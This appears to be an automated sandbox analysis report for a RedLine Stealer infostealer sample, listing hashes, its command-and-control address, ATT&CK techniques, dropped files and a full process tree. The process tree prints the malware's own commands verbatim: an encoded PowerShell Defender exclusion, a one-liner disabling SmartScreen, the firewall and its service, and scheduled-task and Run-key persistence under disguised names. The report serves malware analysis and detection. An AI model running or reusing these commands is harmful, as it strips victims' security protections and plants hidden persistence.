redline | d3d816173bc3f78e89278f938bef7408a249453c31e65018386aa241ee6cbf92

General

Target

47645.exe
Size

1.8MB
MD5

30b6d624d18490acfe42a1944c6d3172
SHA1

35402770ba44139f50b5613c274a6b4607be3b16
SHA256

d3d816173bc3f78e89278f938bef7408a249453c31e65018386aa241ee6cbf92
SHA512

42f7b92a99a52c9a229cf09d945d5fcad38a4eecedfe609af6e77d9f5e966b37835a094c5b2121d20e6339fa450c0488af44046f5057e42021a61aae98cf6f4c

Score

10^/10

redline 1327052997 evasion infostealer persistence spyware suricata

Malware Config

Extracted

Family

redline

Botnet

1327052997

C2

37.235.54.26:8362

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" powershell.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	powershell.exe

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/215452-143-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

doc.exeDllHost.exeGameInject.exe

pid process

1084 doc.exe
3372 DllHost.exe
215712 GameInject.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

27488 netsh.exe

pid	process
1084	doc.exe
3372	DllHost.exe
215712	GameInject.exe

pid	process
27488	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

DllHost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	DllHost.exe

Drops startup file 1 IoCs

Processes:

DllHost.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk DllHost.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	DllHost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

GameInject.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "C:\\ProgramData\\Dllhost\\dllhost.exe"	GameInject.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

21 api.ipify.org
22 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

doc.exe

description pid process target process

PID 1084 set thread context of 215452 1084 doc.exe AppLaunch.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

20784 3372 WerFault.exe DllHost.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4600 schtasks.exe

flow	ioc
21	api.ipify.org
22	api.ipify.org

description	pid	process	target process
PID 1084 set thread context of 215452	1084	doc.exe	AppLaunch.exe

pid	pid_target	process	target process
20784	3372	WerFault.exe	DllHost.exe

pid	process
4600	schtasks.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

DllHost.exepowershell.exeAppLaunch.exeGameInject.exepowershell.exe

pid	process
3372	DllHost.exe
3372	DllHost.exe
3372	DllHost.exe
3372	DllHost.exe
18436	powershell.exe
18436	powershell.exe
215452	AppLaunch.exe
215452	AppLaunch.exe
215712	GameInject.exe
215852	powershell.exe
215852	powershell.exe
215712	GameInject.exe
215712	GameInject.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exeAppLaunch.exeGameInject.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	18436	powershell.exe
Token: SeBackupPrivilege	18436	powershell.exe
Token: SeBackupPrivilege	18436	powershell.exe
Token: SeRestorePrivilege	18436	powershell.exe
Token: SeSecurityPrivilege	18436	powershell.exe
Token: SeDebugPrivilege	215452	AppLaunch.exe
Token: SeDebugPrivilege	215712	GameInject.exe
Token: SeDebugPrivilege	215852	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

47645.exeDllHost.exepowershell.exedoc.exeAppLaunch.exeGameInject.execmd.execmd.exe

description	pid	process	target process
PID 4196 wrote to memory of 1084	4196	47645.exe	doc.exe
PID 4196 wrote to memory of 1084	4196	47645.exe	doc.exe
PID 4196 wrote to memory of 1084	4196	47645.exe	doc.exe
PID 4196 wrote to memory of 3372	4196	47645.exe	DllHost.exe
PID 4196 wrote to memory of 3372	4196	47645.exe	DllHost.exe
PID 3372 wrote to memory of 18436	3372	DllHost.exe	powershell.exe
PID 3372 wrote to memory of 18436	3372	DllHost.exe	powershell.exe
PID 18436 wrote to memory of 27488	18436	powershell.exe	netsh.exe
PID 18436 wrote to memory of 27488	18436	powershell.exe	netsh.exe
PID 1084 wrote to memory of 215452	1084	doc.exe	AppLaunch.exe
PID 1084 wrote to memory of 215452	1084	doc.exe	AppLaunch.exe
PID 1084 wrote to memory of 215452	1084	doc.exe	AppLaunch.exe
PID 1084 wrote to memory of 215452	1084	doc.exe	AppLaunch.exe
PID 1084 wrote to memory of 215452	1084	doc.exe	AppLaunch.exe
PID 215452 wrote to memory of 215712	215452	AppLaunch.exe	GameInject.exe
PID 215452 wrote to memory of 215712	215452	AppLaunch.exe	GameInject.exe
PID 215452 wrote to memory of 215712	215452	AppLaunch.exe	GameInject.exe
PID 215712 wrote to memory of 215800	215712	GameInject.exe	cmd.exe
PID 215712 wrote to memory of 215800	215712	GameInject.exe	cmd.exe
PID 215712 wrote to memory of 215800	215712	GameInject.exe	cmd.exe
PID 215800 wrote to memory of 215852	215800	cmd.exe	powershell.exe
PID 215800 wrote to memory of 215852	215800	cmd.exe	powershell.exe
PID 215800 wrote to memory of 215852	215800	cmd.exe	powershell.exe
PID 215712 wrote to memory of 216008	215712	GameInject.exe	cmd.exe
PID 215712 wrote to memory of 216008	215712	GameInject.exe	cmd.exe
PID 215712 wrote to memory of 216008	215712	GameInject.exe	cmd.exe
PID 215712 wrote to memory of 216020	215712	GameInject.exe	cmd.exe
PID 215712 wrote to memory of 216020	215712	GameInject.exe	cmd.exe
PID 215712 wrote to memory of 216020	215712	GameInject.exe	cmd.exe
PID 216020 wrote to memory of 4600	216020	cmd.exe	schtasks.exe
PID 216020 wrote to memory of 4600	216020	cmd.exe	schtasks.exe
PID 216020 wrote to memory of 4600	216020	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\47645.exe
"C:\Users\Admin\AppData\Local\Temp\47645.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4196

C:\Users\Admin\AppData\Local\Temp\doc.exe
"C:\Users\Admin\AppData\Local\Temp\doc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1084

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:215452

C:\Users\Admin\AppData\Local\Temp\GameInject.exe
"C:\Users\Admin\AppData\Local\Temp\GameInject.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:215712

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAGYAaQB3AEcAOQBOADcAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwA1ADIAQgBxAEIATwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAFUANgBxAG8AWQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAzAEgAUgBLACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
5⤵
- Suspicious use of WriteProcessMemory
PID:215800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGYAaQB3AEcAOQBOADcAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwA1ADIAQgBxAEIATwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAFUANgBxAG8AWQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAzAEgAUgBLACMAPgA="
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:215852

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
5⤵
PID:216008

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8743" /TR "C:\ProgramData\Dllhost\dllhost.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:216020

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8743" /TR "C:\ProgramData\Dllhost\dllhost.exe"
6⤵
- Creates scheduled task(s)
PID:4600

C:\Users\Admin\AppData\Local\Temp\DllHost.exe
"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty вЂ“Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System вЂ“Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty вЂ“Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run вЂ“Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
3⤵
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:18436

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
4⤵
- Modifies Windows Firewall
PID:27488

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3372 -s 2064
3⤵
- Program crash
PID:20784

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 3372 -ip 3372
1⤵
PID:20608

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

2

T1031

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

Web Service

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\MicrosoftNetwork\System.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ddab5e26e538fa9c9f65b6ba13523eb8

SHA1
003942014894706e2498020df601e97b2cd27a56

SHA256
29892a9f94bf3e6e8a675fbdb4faf6e31af24547820d031c23fe78adcf750a31

SHA512
f836fc230e0447b28319390eeaec09ed6e750178f9c0c9e9e43e50c6892c1b2c6138ab96c39c56c7bf9963e9cf06d8cb93801e99ad3465f5ff95d3ce2708b5ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
C:\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
C:\Users\Admin\AppData\Local\Temp\GameInject.exe
Filesize
82KB

MD5
0720a011066bb50774deffd33c5903c8

SHA1
54c4393d7f15192717339ab39be1978127443c79

SHA256
0db9920b4a051c6ee31c6be0ae5d06ff493d85872fead3a906c56e8513fe7da6

SHA512
410e96a4a240245780b9e1939cef06c35ea2192761ca2cfba28add5d7707e9e9ff37d63364389dc729ce42656b60b64e659c460125eb6346d57a2fd1452aa248

Download Submit
C:\Users\Admin\AppData\Local\Temp\GameInject.exe
Filesize
82KB

MD5
0720a011066bb50774deffd33c5903c8

SHA1
54c4393d7f15192717339ab39be1978127443c79

SHA256
0db9920b4a051c6ee31c6be0ae5d06ff493d85872fead3a906c56e8513fe7da6

SHA512
410e96a4a240245780b9e1939cef06c35ea2192761ca2cfba28add5d7707e9e9ff37d63364389dc729ce42656b60b64e659c460125eb6346d57a2fd1452aa248

Download Submit
C:\Users\Admin\AppData\Local\Temp\doc.exe
Filesize
2.4MB

MD5
401cdd939e412e97c9eab5766be869d9

SHA1
e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0

SHA256
7b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573

SHA512
266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b

Download Submit
C:\Users\Admin\AppData\Local\Temp\doc.exe
Filesize
2.4MB

MD5
401cdd939e412e97c9eab5766be869d9

SHA1
e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0

SHA256
7b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573

SHA512
266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b

Download Submit
memory/1084-130-0x0000000000000000-mapping.dmp

Download
memory/3372-133-0x0000000000000000-mapping.dmp

Download
memory/4600-174-0x0000000000000000-mapping.dmp

Download
memory/18436-141-0x00007FF9F9870000-0x00007FF9FA331000-memory.dmp

Filesize
10.8MB

Download
memory/18436-138-0x00007FF9F9870000-0x00007FF9FA331000-memory.dmp

Filesize
10.8MB

Download
memory/18436-137-0x000001C962C00000-0x000001C962C22000-memory.dmp

Filesize
136KB

Download
memory/18436-136-0x0000000000000000-mapping.dmp

Download
memory/27488-139-0x0000000000000000-mapping.dmp

Download
memory/215452-158-0x0000000007B10000-0x0000000007B76000-memory.dmp

Filesize
408KB

Download
memory/215452-142-0x0000000000000000-mapping.dmp

Download
memory/215452-152-0x0000000006A50000-0x0000000006C12000-memory.dmp

Filesize
1.8MB

Download
memory/215452-153-0x0000000007150000-0x000000000767C000-memory.dmp

Filesize
5.2MB

Download
memory/215452-154-0x0000000006C20000-0x0000000006CB2000-memory.dmp

Filesize
584KB

Download
memory/215452-155-0x0000000006CC0000-0x0000000006D36000-memory.dmp

Filesize
472KB

Download
memory/215452-156-0x0000000007C30000-0x00000000081D4000-memory.dmp

Filesize
5.6MB

Download
memory/215452-157-0x0000000006DE0000-0x0000000006DFE000-memory.dmp

Filesize
120KB

Download
memory/215452-150-0x0000000005710000-0x000000000574C000-memory.dmp

Filesize
240KB

Download
memory/215452-151-0x00000000059C0000-0x0000000005ACA000-memory.dmp

Filesize
1.0MB

Download
memory/215452-149-0x00000000056B0000-0x00000000056C2000-memory.dmp

Filesize
72KB

Download
memory/215452-148-0x0000000005E60000-0x0000000006478000-memory.dmp

Filesize
6.1MB

Download
memory/215452-143-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/215712-159-0x0000000000000000-mapping.dmp

Download
memory/215712-163-0x00000000058C0000-0x00000000058CA000-memory.dmp

Filesize
40KB

Download
memory/215712-162-0x0000000000EF0000-0x0000000000F0E000-memory.dmp

Filesize
120KB

Download
memory/215800-164-0x0000000000000000-mapping.dmp

Download
memory/215852-167-0x00000000051E0000-0x0000000005808000-memory.dmp

Filesize
6.2MB

Download
memory/215852-180-0x0000000007330000-0x000000000733A000-memory.dmp

Filesize
40KB

Download
memory/215852-169-0x00000000058B0000-0x0000000005916000-memory.dmp

Filesize
408KB

Download
memory/215852-166-0x0000000004A20000-0x0000000004A56000-memory.dmp

Filesize
216KB

Download
memory/215852-171-0x0000000005FA0000-0x0000000005FBE000-memory.dmp

Filesize
120KB

Download
memory/215852-184-0x0000000007530000-0x0000000007538000-memory.dmp

Filesize
32KB

Download
memory/215852-183-0x00000000075F0000-0x000000000760A000-memory.dmp

Filesize
104KB

Download
memory/215852-165-0x0000000000000000-mapping.dmp

Download
memory/215852-175-0x0000000006560000-0x0000000006592000-memory.dmp

Filesize
200KB

Download
memory/215852-176-0x0000000070890000-0x00000000708DC000-memory.dmp

Filesize
304KB

Download
memory/215852-177-0x0000000006540000-0x000000000655E000-memory.dmp

Filesize
120KB

Download
memory/215852-178-0x00000000078F0000-0x0000000007F6A000-memory.dmp

Filesize
6.5MB

Download
memory/215852-179-0x00000000072A0000-0x00000000072BA000-memory.dmp

Filesize
104KB

Download
memory/215852-168-0x0000000005810000-0x0000000005832000-memory.dmp

Filesize
136KB

Download
memory/215852-181-0x0000000007550000-0x00000000075E6000-memory.dmp

Filesize
600KB

Download
memory/215852-182-0x00000000074E0000-0x00000000074EE000-memory.dmp

Filesize
56KB

Download
memory/216008-172-0x0000000000000000-mapping.dmp

Download
memory/216020-173-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads